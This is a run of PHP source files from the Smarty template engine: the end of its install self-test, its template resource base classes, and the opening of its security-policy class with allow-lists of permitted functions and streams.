                if ($errors === null) {
                    echo "$config_dir is OK.\n";
                }
            }
        }
        if ($errors === null) {
            echo "Testing sysplugin files...\n";
        }
        // test if sysplugins are available
        $source = SMARTY_SYSPLUGINS_DIR;
        if (is_dir($source)) {
            $expectedSysplugins = array(
                'smartycompilerexception.php'                               => true,
                'smartyexception.php'                                       => true,
                'smarty_cacheresource.php'                                  => true,
                'smarty_cacheresource_custom.php'                           => true,
                'smarty_cacheresource_keyvaluestore.php'                    => true,
                'smarty_data.php'                                           => true,
                'smarty_internal_block.php'                                 => true,
                'smarty_internal_cacheresource_file.php'                    => true,
                'smarty_internal_compilebase.php'                           => true,
                'smarty_internal_compile_append.php'                        => true,
                'smarty_internal_compile_assign.php'                        => true,
                'smarty_internal_compile_block.php'                         => true,
                'smarty_internal_compile_block_child.php'                   => true,
                'smarty_internal_compile_block_parent.php'                  => true,
                'smarty_internal_compile_child.php'                         => true,
                'smarty_internal_compile_parent.php'                        => true,
                'smarty_internal_compile_break.php'                         => true,
                'smarty_internal_compile_call.php'                          => true,
                'smarty_internal_compile_capture.php'                       => true,
                'smarty_internal_compile_config_load.php'                   => true,
                'smarty_internal_compile_continue.php'                      => true,
                'smarty_internal_compile_debug.php'                         => true,
                'smarty_internal_compile_eval.php'                          => true,
                'smarty_internal_compile_extends.php'                       => true,
                'smarty_internal_compile_for.php'                           => true,
                'smarty_internal_compile_foreach.php'                       => true,
                'smarty_internal_compile_function.php'                      => true,
                'smarty_internal_compile_if.php'                            => true,
                'smarty_internal_compile_include.php'                       => true,
                'smarty_internal_compile_insert.php'                        => true,
                'smarty_internal_compile_ldelim.php'                        => true,
                'smarty_internal_compile_make_nocache.php'                  => true,
                'smarty_internal_compile_nocache.php'                       => true,
                'smarty_internal_compile_private_block_plugin.php'          => true,
                'smarty_internal_compile_private_foreachsection.php'        => true,
                'smarty_internal_compile_private_function_plugin.php'       => true,
                'smarty_internal_compile_private_modifier.php'              => true,
                'smarty_internal_compile_private_object_block_function.php' => true,
                'smarty_internal_compile_private_object_function.php'       => true,
                'smarty_internal_compile_private_print_expression.php'      => true,
                'smarty_internal_compile_private_registered_block.php'      => true,
                'smarty_internal_compile_private_registered_function.php'   => true,
                'smarty_internal_compile_private_special_variable.php'      => true,
                'smarty_internal_compile_rdelim.php'                        => true,
                'smarty_internal_compile_section.php'                       => true,
                'smarty_internal_compile_setfilter.php'                     => true,
                'smarty_internal_compile_shared_inheritance.php'            => true,
                'smarty_internal_compile_while.php'                         => true,
                'smarty_internal_configfilelexer.php'                       => true,
                'smarty_internal_configfileparser.php'                      => true,
                'smarty_internal_config_file_compiler.php'                  => true,
                'smarty_internal_data.php'                                  => true,
                'smarty_internal_debug.php'                                 => true,
                'smarty_internal_extension_handler.php'                     => true,
                'smarty_internal_method_addautoloadfilters.php'             => true,
                'smarty_internal_method_adddefaultmodifiers.php'            => true,
                'smarty_internal_method_append.php'                         => true,
                'smarty_internal_method_appendbyref.php'                    => true,
                'smarty_internal_method_assignbyref.php'                    => true,
                'smarty_internal_method_assignglobal.php'                   => true,
                'smarty_internal_method_clearallassign.php'                 => true,
                'smarty_internal_method_clearallcache.php'                  => true,
                'smarty_internal_method_clearassign.php'                    => true,
                'smarty_internal_method_clearcache.php'                     => true,
                'smarty_internal_method_clearcompiledtemplate.php'          => true,
                'smarty_internal_method_clearconfig.php'                    => true,
                'smarty_internal_method_compileallconfig.php'               => true,
                'smarty_internal_method_compilealltemplates.php'            => true,
                'smarty_internal_method_configload.php'                     => true,
                'smarty_internal_method_createdata.php'                     => true,
                'smarty_internal_method_getautoloadfilters.php'             => true,
                'smarty_internal_method_getconfigvariable.php'              => true,
                'smarty_internal_method_getconfigvars.php'                  => true,
                'smarty_internal_method_getdebugtemplate.php'               => true,
                'smarty_internal_method_getdefaultmodifiers.php'            => true,
                'smarty_internal_method_getglobal.php'                      => true,
                'smarty_internal_method_getregisteredobject.php'            => true,
                'smarty_internal_method_getstreamvariable.php'              => true,
                'smarty_internal_method_gettags.php'                        => true,
                'smarty_internal_method_gettemplatevars.php'                => true,
                'smarty_internal_method_literals.php'                       => true,
                'smarty_internal_method_loadfilter.php'                     => true,
                'smarty_internal_method_loadplugin.php'                     => true,
                'smarty_internal_method_mustcompile.php'                    => true,
                'smarty_internal_method_registercacheresource.php'          => true,
                'smarty_internal_method_registerclass.php'                  => true,
                'smarty_internal_method_registerdefaultconfighandler.php'   => true,
                'smarty_internal_method_registerdefaultpluginhandler.php'   => true,
                'smarty_internal_method_registerdefaulttemplatehandler.php' => true,
                'smarty_internal_method_registerfilter.php'                 => true,
                'smarty_internal_method_registerobject.php'                 => true,
                'smarty_internal_method_registerplugin.php'                 => true,
                'smarty_internal_method_registerresource.php'               => true,
                'smarty_internal_method_setautoloadfilters.php'             => true,
                'smarty_internal_method_setdebugtemplate.php'               => true,
                'smarty_internal_method_setdefaultmodifiers.php'            => true,
                'smarty_internal_method_unloadfilter.php'                   => true,
                'smarty_internal_method_unregistercacheresource.php'        => true,
                'smarty_internal_method_unregisterfilter.php'               => true,
                'smarty_internal_method_unregisterobject.php'               => true,
                'smarty_internal_method_unregisterplugin.php'               => true,
                'smarty_internal_method_unregisterresource.php'             => true,
                'smarty_internal_nocache_insert.php'                        => true,
                'smarty_internal_parsetree.php'                             => true,
                'smarty_internal_parsetree_code.php'                        => true,
                'smarty_internal_parsetree_dq.php'                          => true,
                'smarty_internal_parsetree_dqcontent.php'                   => true,
                'smarty_internal_parsetree_tag.php'                         => true,
                'smarty_internal_parsetree_template.php'                    => true,
                'smarty_internal_parsetree_text.php'                        => true,
                'smarty_internal_resource_eval.php'                         => true,
                'smarty_internal_resource_extends.php'                      => true,
                'smarty_internal_resource_file.php'                         => true,
                'smarty_internal_resource_php.php'                          => true,
                'smarty_internal_resource_stream.php'                       => true,
                'smarty_internal_resource_string.php'                       => true,
                'smarty_internal_runtime_cachemodify.php'                   => true,
                'smarty_internal_runtime_cacheresourcefile.php'             => true,
                'smarty_internal_runtime_capture.php'                       => true,
                'smarty_internal_runtime_codeframe.php'                     => true,
                'smarty_internal_runtime_filterhandler.php'                 => true,
                'smarty_internal_runtime_foreach.php'                       => true,
                'smarty_internal_runtime_getincludepath.php'                => true,
                'smarty_internal_runtime_inheritance.php'                   => true,
                'smarty_internal_runtime_make_nocache.php'                  => true,
                'smarty_internal_runtime_tplfunction.php'                   => true,
                'smarty_internal_runtime_updatecache.php'                   => true,
                'smarty_internal_runtime_updatescope.php'                   => true,
                'smarty_internal_runtime_writefile.php'                     => true,
                'smarty_internal_smartytemplatecompiler.php'                => true,
                'smarty_internal_template.php'                              => true,
                'smarty_internal_templatebase.php'                          => true,
                'smarty_internal_templatecompilerbase.php'                  => true,
                'smarty_internal_templatelexer.php'                         => true,
                'smarty_internal_templateparser.php'                        => true,
                'smarty_internal_testinstall.php'                           => true,
                'smarty_internal_undefined.php'                             => true,
                'smarty_resource.php'                                       => true,
                'smarty_resource_custom.php'                                => true,
                'smarty_resource_recompiled.php'                            => true,
                'smarty_resource_uncompiled.php'                            => true,
                'smarty_security.php'                                       => true,
                'smarty_template_cached.php'                                => true,
                'smarty_template_compiled.php'                              => true,
                'smarty_template_config.php'                                => true,
                'smarty_template_resource_base.php'                         => true,
                'smarty_template_source.php'                                => true,
                'smarty_undefined_variable.php'                             => true,
                'smarty_variable.php'                                       => true,
            );
            $iterator = new DirectoryIterator($source);
            foreach ($iterator as $file) {
                if (!$file->isDot()) {
                    $filename = $file->getFilename();
                    if (isset($expectedSysplugins[ $filename ])) {
                        unset($expectedSysplugins[ $filename ]);
                    }
                }
            }
            if ($expectedSysplugins) {
                $status = false;
                $message = "FAILED: files missing from libs/sysplugins: " . join(', ', array_keys($expectedSysplugins));
                if ($errors === null) {
                    echo $message . ".\n";
                } else {
                    $errors[ 'sysplugins' ] = $message;
                }
            } elseif ($errors === null) {
                echo "... OK\n";
            }
        } else {
            $status = false;
            $message = "FAILED: " . SMARTY_SYSPLUGINS_DIR . ' is not a directory';
            if ($errors === null) {
                echo $message . ".\n";
            } else {
                $errors[ 'sysplugins_dir_constant' ] = $message;
            }
        }
        if ($errors === null) {
            echo "Testing plugin files...\n";
        }
        // test if core plugins are available
        $source = SMARTY_PLUGINS_DIR;
        if (is_dir($source)) {
            $expectedPlugins = array(
                'block.textformat.php'                  => true,
                'function.counter.php'                  => true,
                'function.cycle.php'                    => true,
                'function.fetch.php'                    => true,
                'function.html_checkboxes.php'          => true,
                'function.html_image.php'               => true,
                'function.html_options.php'             => true,
                'function.html_radios.php'              => true,
                'function.html_select_date.php'         => true,
                'function.html_select_time.php'         => true,
                'function.html_table.php'               => true,
                'function.mailto.php'                   => true,
                'function.math.php'                     => true,
                'modifier.capitalize.php'               => true,
                'modifier.date_format.php'              => true,
                'modifier.debug_print_var.php'          => true,
                'modifier.escape.php'                   => true,
                'modifier.mb_wordwrap.php'              => true,
                'modifier.regex_replace.php'            => true,
                'modifier.replace.php'                  => true,
                'modifier.spacify.php'                  => true,
                'modifier.truncate.php'                 => true,
                'modifiercompiler.cat.php'              => true,
                'modifiercompiler.count_characters.php' => true,
                'modifiercompiler.count_paragraphs.php' => true,
                'modifiercompiler.count_sentences.php'  => true,
                'modifiercompiler.count_words.php'      => true,
                'modifiercompiler.default.php'          => true,
                'modifiercompiler.escape.php'           => true,
                'modifiercompiler.from_charset.php'     => true,
                'modifiercompiler.indent.php'           => true,
                'modifiercompiler.lower.php'            => true,
                'modifiercompiler.noprint.php'          => true,
                'modifiercompiler.string_format.php'    => true,
                'modifiercompiler.strip.php'            => true,
                'modifiercompiler.strip_tags.php'       => true,
                'modifiercompiler.to_charset.php'       => true,
                'modifiercompiler.unescape.php'         => true,
                'modifiercompiler.upper.php'            => true,
                'modifiercompiler.wordwrap.php'         => true,
                'outputfilter.trimwhitespace.php'       => true,
                'shared.escape_special_chars.php'       => true,
                'shared.literal_compiler_param.php'     => true,
                'shared.make_timestamp.php'             => true,
                'shared.mb_str_replace.php'             => true,
                'shared.mb_unicode.php'                 => true,
                'variablefilter.htmlspecialchars.php'   => true,
            );
            $iterator = new DirectoryIterator($source);
            foreach ($iterator as $file) {
                if (!$file->isDot()) {
                    $filename = $file->getFilename();
                    if (isset($expectedPlugins[ $filename ])) {
                        unset($expectedPlugins[ $filename ]);
                    }
                }
            }
            if ($expectedPlugins) {
                $status = false;
                $message = "FAILED: files missing from libs/plugins: " . join(', ', array_keys($expectedPlugins));
                if ($errors === null) {
                    echo $message . ".\n";
                } else {
                    $errors[ 'plugins' ] = $message;
                }
            } elseif ($errors === null) {
                echo "... OK\n";
            }
        } else {
            $status = false;
            $message = "FAILED: " . SMARTY_PLUGINS_DIR . ' is not a directory';
            if ($errors === null) {
                echo $message . ".\n";
            } else {
                $errors[ 'plugins_dir_constant' ] = $message;
            }
        }
        if ($errors === null) {
            echo "Tests complete.\n";
            echo "</PRE>\n";
        }
        return $status;
    }
}
<?php

/**
 * Smarty Internal Undefined
 *
 * Class to handle undefined method calls or calls to obsolete runtime extensions
 *
 * @package    Smarty
 * @subpackage PluginsInternal
 * @author     Uwe Tews
 */
class Smarty_Internal_Undefined
{
    /**
     * Name of undefined extension class
     *
     * @var string|null
     */
    public $class = null;

    /**
     * Smarty_Internal_Undefined constructor.
     *
     * @param null|string $class name of undefined extension class
     */
    public function __construct($class = null)
    {
        $this->class = $class;
    }

    /**
     * Wrapper for obsolete class Smarty_Internal_Runtime_ValidateCompiled
     *
     * @param \Smarty_Internal_Template $tpl
     * @param array                     $properties special template properties
     * @param bool                      $cache      flag if called from cache file
     *
     * @return bool false
     */
    public function decodeProperties(Smarty_Internal_Template $tpl, $properties, $cache = false)
    {
        if ($cache) {
            $tpl->cached->valid = false;
        } else {
            $tpl->mustCompile = true;
        }
        return false;
    }

    /**
     * Call error handler for undefined method
     *
     * @param string $name unknown method-name
     * @param array  $args argument array
     *
     * @return mixed
     * @throws SmartyException
     */
    public function __call($name, $args)
    {
        if (isset($this->class)) {
            throw new SmartyException("undefined extension class '{$this->class}'");
        } else {
            throw new SmartyException(get_class($args[ 0 ]) . "->{$name}() undefined method");
        }
    }
}
<?php
/**
 * Smarty Resource Plugin
 *
 * @package    Smarty
 * @subpackage TemplateResources
 * @author     Rodney Rehm
 */

/**
 * Smarty Resource Plugin
 * Base implementation for resource plugins
 *
 * @package    Smarty
 * @subpackage TemplateResources
 *
 * @method renderUncompiled(Smarty_Template_Source $source, Smarty_Internal_Template $_template)
 * @method populateCompiledFilepath(Smarty_Template_Compiled $compiled, Smarty_Internal_Template $_template)
 * @method process(Smarty_Internal_Template $_smarty_tpl)
 */
abstract class Smarty_Resource
{
    /**
     * resource types provided by the core
     *
     * @var array
     */
    public static $sysplugins = array(
        'file'    => 'smarty_internal_resource_file.php',
        'string'  => 'smarty_internal_resource_string.php',
        'extends' => 'smarty_internal_resource_extends.php',
        'stream'  => 'smarty_internal_resource_stream.php',
        'eval'    => 'smarty_internal_resource_eval.php',
        'php'     => 'smarty_internal_resource_php.php'
    );

    /**
     * Source is bypassing compiler
     *
     * @var boolean
     */
    public $uncompiled = false;

    /**
     * Source must be recompiled on every occasion
     *
     * @var boolean
     */
    public $recompiled = false;

    /**
     * Flag if resource does implement populateCompiledFilepath() method
     *
     * @var bool
     */
    public $hasCompiledHandler = false;

    /**
     * Load Resource Handler
     *
     * @param Smarty $smarty smarty object
     * @param string $type   name of the resource
     *
     * @throws SmartyException
     * @return Smarty_Resource Resource Handler
     */
    public static function load(Smarty $smarty, $type)
    {
        // try smarty's cache
        if (isset($smarty->_cache[ 'resource_handlers' ][ $type ])) {
            return $smarty->_cache[ 'resource_handlers' ][ $type ];
        }
        // try registered resource
        if (isset($smarty->registered_resources[ $type ])) {
            return $smarty->_cache[ 'resource_handlers' ][ $type ] = $smarty->registered_resources[ $type ];
        }
        // try sysplugins dir
        if (isset(self::$sysplugins[ $type ])) {
            $_resource_class = 'Smarty_Internal_Resource_' . smarty_ucfirst_ascii($type);
            return $smarty->_cache[ 'resource_handlers' ][ $type ] = new $_resource_class();
        }
        // try plugins dir
        $_resource_class = 'Smarty_Resource_' . smarty_ucfirst_ascii($type);
        if ($smarty->loadPlugin($_resource_class)) {
            if (class_exists($_resource_class, false)) {
                return $smarty->_cache[ 'resource_handlers' ][ $type ] = new $_resource_class();
            } else {
                $smarty->registerResource(
                    $type,
                    array(
                        "smarty_resource_{$type}_source", "smarty_resource_{$type}_timestamp",
                        "smarty_resource_{$type}_secure", "smarty_resource_{$type}_trusted"
                    )
                );
                // give it another try, now that the resource is registered properly
                return self::load($smarty, $type);
            }
        }
        // try streams
        $_known_stream = stream_get_wrappers();
        if (in_array($type, $_known_stream)) {
            // is known stream
            if (is_object($smarty->security_policy)) {
                $smarty->security_policy->isTrustedStream($type);
            }
            return $smarty->_cache[ 'resource_handlers' ][ $type ] = new Smarty_Internal_Resource_Stream();
        }
        // TODO: try default_(template|config)_handler
        // give up
        throw new SmartyException("Unknown resource type '{$type}'");
    }

    /**
     * extract resource_type and resource_name from template_resource and config_resource
     *
     * @note "C:/foo.tpl" was forced to file resource up till Smarty 3.1.3 (including).
     *
     * @param string $resource_name    template_resource or config_resource to parse
     * @param string $default_resource the default resource_type defined in $smarty
     *
     * @return array with parsed resource name and type
     */
    public static function parseResourceName($resource_name, $default_resource)
    {
        if (preg_match('/^([A-Za-z0-9_\-]{2,})[:]/', $resource_name, $match)) {
            $type = $match[ 1 ];
            $name = substr($resource_name, strlen($match[ 0 ]));
        } else {
            // no resource given, use default
            // or single character before the colon is not a resource type, but part of the filepath
            $type = $default_resource;
            $name = $resource_name;
        }
        return array($name, $type);
    }

    /**
     * modify template_resource according to resource handlers specifications
     *
     * @param \Smarty_Internal_Template|\Smarty $obj               Smarty instance
     * @param string                            $template_resource template_resource to extract resource handler and
     *                                                             name of
     *
     * @return string unique resource name
     * @throws \SmartyException
     */
    public static function getUniqueTemplateName($obj, $template_resource)
    {
        $smarty = $obj->_getSmartyObj();
        list($name, $type) = self::parseResourceName($template_resource, $smarty->default_resource_type);
        // TODO: optimize for Smarty's internal resource types
        $resource = Smarty_Resource::load($smarty, $type);
        // go relative to a given template?
        $_file_is_dotted = $name[ 0 ] === '.' && ($name[ 1 ] === '.' || $name[ 1 ] === '/');
        if ($obj->_isTplObj() && $_file_is_dotted
            && ($obj->source->type === 'file' || $obj->parent->source->type === 'extends')
        ) {
            $name = $smarty->_realpath(dirname($obj->parent->source->filepath) . DIRECTORY_SEPARATOR . $name);
        }
        return $resource->buildUniqueResourceName($smarty, $name);
    }

    /**
     * initialize Source Object for given resource
     * wrapper for backward compatibility to versions < 3.1.22
     * Either [$_template] or [$smarty, $template_resource] must be specified
     *
     * @param Smarty_Internal_Template|null $_template         template object
     * @param Smarty|null                   $smarty            smarty object
     * @param string                        $template_resource resource identifier
     *
     * @return \Smarty_Template_Source Source Object
     * @throws \SmartyException
     */
    public static function source(
        ?Smarty_Internal_Template $_template = null,
        ?Smarty $smarty = null,
        $template_resource = null
    ) {
        return Smarty_Template_Source::load($_template, $smarty, $template_resource);
    }

    /**
     * Load template's source into current template object
     *
     * @param Smarty_Template_Source $source source object
     *
     * @return string                 template source
     * @throws SmartyException        if source cannot be loaded
     */
    abstract public function getContent(Smarty_Template_Source $source);

    /**
     * populate Source Object with meta data from Resource
     *
     * @param Smarty_Template_Source        $source    source object
     * @param Smarty_Internal_Template|null $_template template object
     */
    abstract public function populate(Smarty_Template_Source $source, ?Smarty_Internal_Template $_template = null);

    /**
     * populate Source Object with timestamp and exists from Resource
     *
     * @param Smarty_Template_Source $source source object
     */
    public function populateTimestamp(Smarty_Template_Source $source)
    {
        // intentionally left blank
    }

    /**
     * modify resource_name according to resource handlers specifications
     *
     * @param Smarty  $smarty        Smarty instance
     * @param string  $resource_name resource_name to make unique
     * @param boolean $isConfig      flag for config resource
     *
     * @return string unique resource name
     */
    public function buildUniqueResourceName(Smarty $smarty, $resource_name, $isConfig = false)
    {
        if ($isConfig) {
            if (!isset($smarty->_joined_config_dir)) {
                $smarty->getTemplateDir(null, true);
            }
            return get_class($this) . '#' . $smarty->_joined_config_dir . '#' . $resource_name;
        } else {
            if (!isset($smarty->_joined_template_dir)) {
                $smarty->getTemplateDir();
            }
            return get_class($this) . '#' . $smarty->_joined_template_dir . '#' . $resource_name;
        }
    }

    /*
     * Check if resource must check time stamps when when loading complied or cached templates.
     * Resources like 'extends' which use source components my disable timestamp checks on own resource.
     *
     * @return bool
     */
    /**
     * Determine basename for compiled filename
     *
     * @param Smarty_Template_Source $source source object
     *
     * @return string                 resource's basename
     */
    public function getBasename(Smarty_Template_Source $source)
    {
        return basename(preg_replace('![^\w]+!', '_', $source->name));
    }

    /**
     * @return bool
     */
    public function checkTimestamps()
    {
        return true;
    }
}
<?php
/**
 * Smarty Resource Plugin
 *
 * @package    Smarty
 * @subpackage TemplateResources
 * @author     Rodney Rehm
 */

/**
 * Smarty Resource Plugin
 * Wrapper Implementation for custom resource plugins
 *
 * @package    Smarty
 * @subpackage TemplateResources
 */
abstract class Smarty_Resource_Custom extends Smarty_Resource
{
    /**
     * fetch template and its modification time from data source
     *
     * @param string  $name    template name
     * @param string  &$source template source
     * @param integer &$mtime  template modification timestamp (epoch)
     */
    abstract protected function fetch($name, &$source, &$mtime);

    /**
     * Fetch template's modification timestamp from data source
     * {@internal implementing this method is optional.
     *  Only implement it if modification times can be accessed faster than loading the complete template source.}}
     *
     * @param string $name template name
     *
     * @return integer|boolean timestamp (epoch) the template was modified, or false if not found
     */
    protected function fetchTimestamp($name)
    {
        return null;
    }

    /**
     * populate Source Object with meta data from Resource
     *
     * @param Smarty_Template_Source        $source    source object
     * @param Smarty_Internal_Template|null $_template template object
     */
    public function populate(Smarty_Template_Source $source, ?Smarty_Internal_Template $_template = null)
    {
        $source->filepath = $source->type . ':' . $this->generateSafeName($source->name);
        $source->uid = sha1($source->type . ':' . $source->name);
        $mtime = $this->fetchTimestamp($source->name);
        if ($mtime !== null) {
            $source->timestamp = $mtime;
        } else {
            $this->fetch($source->name, $content, $timestamp);
            $source->timestamp = isset($timestamp) ? $timestamp : false;
            if (isset($content)) {
                $source->content = $content;
            }
        }
        $source->exists = !!$source->timestamp;
    }

    /**
     * Load template's source into current template object
     *
     * @param Smarty_Template_Source $source source object
     *
     * @return string                 template source
     * @throws SmartyException        if source cannot be loaded
     */
    public function getContent(Smarty_Template_Source $source)
    {
        $this->fetch($source->name, $content, $timestamp);
        if (isset($content)) {
            return $content;
        }
        throw new SmartyException("Unable to read template {$source->type} '{$source->name}'");
    }

    /**
     * Determine basename for compiled filename
     *
     * @param Smarty_Template_Source $source source object
     *
     * @return string                 resource's basename
     */
    public function getBasename(Smarty_Template_Source $source)
    {
        return basename($this->generateSafeName($source->name));
    }

    /**
     * Removes special characters from $name and limits its length to 127 characters.
     *
     * @param $name
     *
     * @return string
     */
    private function generateSafeName($name): string {
        return substr(preg_replace('/[^A-Za-z0-9._]/', '', (string) $name), 0, 127);
    }
}
<?php
/**
 * Smarty Resource Plugin
 *
 * @package    Smarty
 * @subpackage TemplateResources
 * @author     Rodney Rehm
 */

/**
 * Smarty Resource Plugin
 * Base implementation for resource plugins that don't compile cache
 *
 * @package    Smarty
 * @subpackage TemplateResources
 */
abstract class Smarty_Resource_Recompiled extends Smarty_Resource
{
    /**
     * Flag that it's an recompiled resource
     *
     * @var bool
     */
    public $recompiled = true;

    /**
     * Resource does implement populateCompiledFilepath() method
     *
     * @var bool
     */
    public $hasCompiledHandler = true;

    /**
     * compile template from source
     *
     * @param Smarty_Internal_Template $_smarty_tpl do not change variable name, is used by compiled template
     *
     * @throws Exception
     */
    public function process(Smarty_Internal_Template $_smarty_tpl)
    {
        $compiled = &$_smarty_tpl->compiled;
        $compiled->file_dependency = array();
        $compiled->includes = array();
        $compiled->nocache_hash = null;
        $compiled->unifunc = null;
        $level = ob_get_level();
        ob_start();
        $_smarty_tpl->loadCompiler();
        // call compiler
        try {
            eval('?>' . $_smarty_tpl->compiler->compileTemplate($_smarty_tpl));
        } catch (Exception $e) {
            unset($_smarty_tpl->compiler);
            while (ob_get_level() > $level) {
                ob_end_clean();
            }
            throw $e;
        }
        // release compiler object to free memory
        unset($_smarty_tpl->compiler);
        ob_get_clean();
        $compiled->timestamp = time();
        $compiled->exists = true;
    }

    /**
     * populate Compiled Object with compiled filepath
     *
     * @param Smarty_Template_Compiled $compiled  compiled object
     * @param Smarty_Internal_Template $_template template object
     *
     * @return void
     */
    public function populateCompiledFilepath(Smarty_Template_Compiled $compiled, Smarty_Internal_Template $_template)
    {
        $compiled->filepath = false;
        $compiled->timestamp = false;
        $compiled->exists = false;
    }

    /*
       * Disable timestamp checks for recompiled resource.
       *
       * @return bool
       */
    /**
     * @return bool
     */
    public function checkTimestamps()
    {
        return false;
    }
}
<?php
/**
 * Smarty Resource Plugin
 *
 * @package    Smarty
 * @subpackage TemplateResources
 * @author     Rodney Rehm
 */

/**
 * Smarty Resource Plugin
 * Base implementation for resource plugins that don't use the compiler
 *
 * @package    Smarty
 * @subpackage TemplateResources
 */
abstract class Smarty_Resource_Uncompiled extends Smarty_Resource
{
    /**
     * Flag that it's an uncompiled resource
     *
     * @var bool
     */
    public $uncompiled = true;

    /**
     * Resource does implement populateCompiledFilepath() method
     *
     * @var bool
     */
    public $hasCompiledHandler = true;

    /**
     * populate compiled object with compiled filepath
     *
     * @param Smarty_Template_Compiled $compiled  compiled object
     * @param Smarty_Internal_Template $_template template object
     */
    public function populateCompiledFilepath(Smarty_Template_Compiled $compiled, Smarty_Internal_Template $_template)
    {
        $compiled->filepath = $_template->source->filepath;
        $compiled->timestamp = $_template->source->timestamp;
        $compiled->exists = $_template->source->exists;
        if ($_template->smarty->merge_compiled_includes || $_template->source->handler->checkTimestamps()) {
            $compiled->file_dependency[ $_template->source->uid ] =
                array($compiled->filepath, $compiled->timestamp, $_template->source->type,);
        }
    }
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage Security
 * @author     Uwe Tews
 */
/**
 * FIXME: Smarty_Security API
 *      - getter and setter instead of public properties would allow cultivating an internal cache properly
 *      - current implementation of isTrustedResourceDir() assumes that Smarty::$template_dir and Smarty::$config_dir
 *      are immutable the cache is killed every time either of the variables change. That means that two distinct
 *      Smarty objects with differing
 *        $template_dir or $config_dir should NOT share the same Smarty_Security instance,
 *        as this would lead to (severe) performance penalty! how should this be handled?
 */

/**
 * This class does contain the security settings
 */
#[\AllowDynamicProperties]
class Smarty_Security
{

    /**
     * This is the list of template directories that are considered secure.
     * $template_dir is in this list implicitly.
     *
     * @var array
     */
    public $secure_dir = array();

    /**
     * This is an array of directories where trusted php scripts reside.
     * {@link $security} is disabled during their inclusion/execution.
     *
     * @var array
     */
    public $trusted_dir = array();

    /**
     * List of regular expressions (PCRE) that include trusted URIs
     *
     * @var array
     */
    public $trusted_uri = array();

    /**
     * List of trusted constants names
     *
     * @var array
     */
    public $trusted_constants = array();

    /**
     * This is an array of trusted static classes.
     * If empty access to all static classes is allowed.
     * If set to 'none' none is allowed.
     *
     * @var array
     */
    public $static_classes = array();

    /**
     * This is an nested array of trusted classes and static methods.
     * If empty access to all static classes and methods is allowed.
     * Format:
     * array (
     *         'class_1' => array('method_1', 'method_2'), // allowed methods listed
     *         'class_2' => array(),                       // all methods of class allowed
     *       )
     * If set to null none is allowed.
     *
     * @var array
     */
    public $trusted_static_methods = array();

    /**
     * This is an array of trusted static properties.
     * If empty access to all static classes and properties is allowed.
     * Format:
     * array (
     *         'class_1' => array('prop_1', 'prop_2'), // allowed properties listed
     *         'class_2' => array(),                   // all properties of class allowed
     *       )
     * If set to null none is allowed.
     *
     * @var array
     */
    public $trusted_static_properties = array();

    /**
     * This is an array of trusted PHP functions.
     * If empty all functions are allowed.
     * To disable all PHP functions set $php_functions = null.
     *
     * @var array
     */
    public $php_functions = array('isset', 'empty', 'count', 'sizeof', 'in_array', 'is_array', 'time',);

    /**
     * This is an array of trusted PHP modifiers.
     * If empty all modifiers are allowed.
     * To disable all modifier set $php_modifiers = null.
     *
     * @var array
     */
    public $php_modifiers = array('escape', 'count', 'sizeof', 'nl2br',);

    /**
     * This is an array of allowed tags.
     * If empty no restriction by allowed_tags.
     *
     * @var array
     */
    public $allowed_tags = array();

    /**
     * This is an array of disabled tags.
     * If empty no restriction by disabled_tags.
     *
     * @var array
     */
    public $disabled_tags = array();

    /**
     * This is an array of allowed modifier plugins.
     * If empty no restriction by allowed_modifiers.
     *
     * @var array
     */
    public $allowed_modifiers = array();

    /**
     * This is an array of disabled modifier plugins.
     * If empty no restriction by disabled_modifiers.
     *
     * @var array
     */
    public $disabled_modifiers = array();

    /**
     * This is an array of disabled special $smarty variables.
     *
     * @var array
     */
    public $disabled_special_smarty_vars = array();

    /**
     * This is an array of trusted streams.
     * If empty all streams are allowed.
     * To disable all streams set $streams = null.
     *
     * @var array
     */
    public $streams = array('file');

    /**
     * + flag if constants can be accessed from template
     *
     * @var boolean
     */
    public $allow_constants = true;

    /**
     * + flag if super globals can be accessed from template
     *
     * @var boolean
     */
    public $allow_super_globals = true;

    /**
     * max template nesting level
     *
     * @var int
     */
    public $max_template_nesting = 0;

    /**
     * current template nesting level
     *
     * @var int
     */
    private $_current_template_nesting = 0;

    /**
     * Cache for $resource_dir lookup
     *
     * @var array
     */
    protected $_resource_dir = array();

    /**
     * Cache for $template_dir lookup
     *
     * @var array
     */
    protected $_template_dir = array();

    /**
     * Cache for $config_dir lookup
     *
     * @var array
     */
    protected $_config_dir = array();

    /**
     * Cache for $secure_dir lookup
     *
     * @var array
     */
    protected $_secure_dir = array();

    /**
     * Cache for $php_resource_dir lookup
     *
     * @var array
     */
    protected $_php_resource_dir = null;

    /**
     * Cache for $trusted_dir lookup
     *
     * @var array
     */
    protected $_trusted_dir = null;

    /**
     * Cache for include path status
     *
     * @var bool
     */
    protected $_include_path_status = false;

    /**
     * Cache for $_include_array lookup
     *
     * @var array
     */
    protected $_include_dir = array();

    /**
     * @param Smarty $smarty
     */
    public function __construct($smarty)
    {
        $this->smarty = $smarty;
    }

    /**
     * Check if PHP function is trusted.
     *
     * @param string $function_name
     * @param object $compiler compiler object
     * @deprecated
     * @return boolean                 true if function is trusted
     */
    public function isTrustedPhpFunction($function_name, $compiler)
    {
        if (isset($this->php_functions)
            && (empty($this->php_functions) || in_array($function_name, $this->php_functions))
        ) {
            return true;
        }
        $compiler->trigger_template_error("PHP function '{$function_name}' not allowed by security setting");
        return false; // should not, but who knows what happens to the compiler in the future?
    }

    /**
     * Check if static class is trusted.
     *
     * @param string $class_name
     * @param object $compiler compiler object
     *
     * @return boolean                 true if class is trusted
     */
    public function isTrustedStaticClass($class_name, $compiler)
    {
        if (isset($this->static_classes)
            && (empty($this->static_classes) || in_array($class_name, $this->static_classes))
        ) {
            return true;
        }
        $compiler->trigger_template_error("access to static class '{$class_name}' not allowed by security setting");
        return false; // should not, but who knows what happens to the compiler in the future?
    }

    /**
     * Check if static class method/property is trusted.
     *
     * @param string $class_name
     * @param string $params
     * @param object $compiler compiler object
     *
     * @return boolean                 true if class method is trusted
     */
    public function isTrustedStaticClassAccess($class_name, $params, $compiler)
    {
        if (!isset($params[ 2 ])) {
            // fall back
            return $this->isTrustedStaticClass($class_name, $compiler);
        }
        if ($params[ 2 ] === 'method') {
            $allowed = $this->trusted_static_methods;
            $name = substr($params[ 0 ], 0, strpos($params[ 0 ], '('));
        } else {
            $allowed = $this->trusted_static_properties;
            // strip '$'
            $name = substr($params[ 0 ], 1);
        }
        if (isset($allowed)) {
            if (empty($allowed)) {
                // fall back
                return $this->isTrustedStaticClass($class_name, $compiler);
            }
